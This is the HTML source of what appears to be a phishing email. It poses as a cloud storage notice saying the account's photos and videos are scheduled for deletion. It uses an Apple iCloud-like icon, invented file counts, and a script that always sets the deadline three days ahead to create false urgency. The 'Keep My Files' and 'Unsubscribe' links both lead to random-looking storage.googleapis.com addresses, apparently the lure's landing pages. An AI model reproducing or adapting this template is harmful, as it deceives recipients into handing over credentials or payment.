<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Data Loss Warning</title>
<style>
body {
margin: 0;
padding: 0;
background: #ffffff;
font-family: Helvetica, Arial, sans-serif;
color: #333;
}
.wrap {
max-width: 600px;
margin: 0 auto;
padding: 20px;
}
.logo {
display: block;
max-width: 120px;
margin-bottom: 20px;
}
.notice-box {
border: 1px solid #ef4444;
background: #fef2f2;
padding: 20px;
border-radius: 8px;
text-align: left;
}
.warning-head {
color: #b91c1c;
font-size: 18px;
font-weight: bold;
margin-bottom: 10px;
display: flex;
align-items: center;
}
.warning-badge {
background: #b91c1c;
color: #fff;
font-size: 11px;
padding: 2px 6px;
border-radius: 3px;
margin-right: 8px;
}
.body-text {
font-size: 15px;
line-height: 24px;
color: #1f2937;
margin-bottom: 20px;
}
.file-list {
background: #fff;
padding: 15px;
border: 1px solid #fca5a5;
border-radius: 6px;
margin-bottom: 20px;
}
.file-item {
display: block;
padding: 5px 0;
font-size: 14px;
color: #555;
border-bottom: 1px dashed #ddd;
}
.file-item:last-child {
border-bottom: none;
}
.file-item strong {
color: #000;
}
.btn-main {
background: #2563eb;
color: #ffffff;
padding: 15px 30px;
text-decoration: none;
border-radius: 5px;
font-weight: bold;
font-size: 16px;
display: inline-block;
}
.date-highlight {
background: #ffeba1;
padding: 2px 5px;
font-weight: bold;
}
</style>
</head>
<body>
<div class="wrap">
<!-- Replace with your logo URL -->
<img src="https://www.freeiconspng.com/uploads/icloud-icon-social-transparent-cloud-drive-icona-apple-ico-cloudzat-libero-transparent-background-11.png" class="logo" alt="Cloud Storage">
<div class="notice-box">
<div class="warning-head">
<span class="warning-badge">!</span> Scheduled for Deletion
</div>
<p class="body-text">
<strong>Dear User,</strong><br><br>
This is a notification regarding the data hosted on your inactive account. Per our retention policy, files on inactive accounts are scheduled for permanent removal on
<span class="date-highlight" id="date3"></span>.
</p>
<div class="file-list">
<div class="file-item"><strong>Status:</strong> Pending Deletion</div>
<div class="file-item"><strong>Photos:</strong> 4,203 files found</div>
<div class="file-item"><strong>Videos:</strong> 112 files found</div>
<div class="file-item"><strong>Action:</strong>
<span style="color:#ef4444; font-weight:bold;">Renew to prevent loss</span></div>
</div>
<center>
<a href="https://storage.googleapis.com/qlskdgjapozuztjkbv/lis" class="btn-main">Keep My Files</a>
</center>
</div>
<p style="font-size:13px; color:#999; margin-top:30px; text-align:center;">
If you allow your account to expire, we cannot recover your files once they are deleted from our
servers.<br><br>
<a href="https://storage.googleapis.com/oiztrzefhjqsdfjjhqsdf/lis" style="color:#999; text-decoration:underline;">Unsubscribe</a>
</p>
</div>
<MailScannerScript13572 script>
const d3 = new Date();
// Set date to 3 days from now
d3.setDate(d3.getDate() + 3);
document.getElementById('date3').innerText = d3.toLocaleDateString('en-US', { month: 'long', day: 'numeric', year: 'numeric' });
</MailScannerScript13572>
</body>
</html>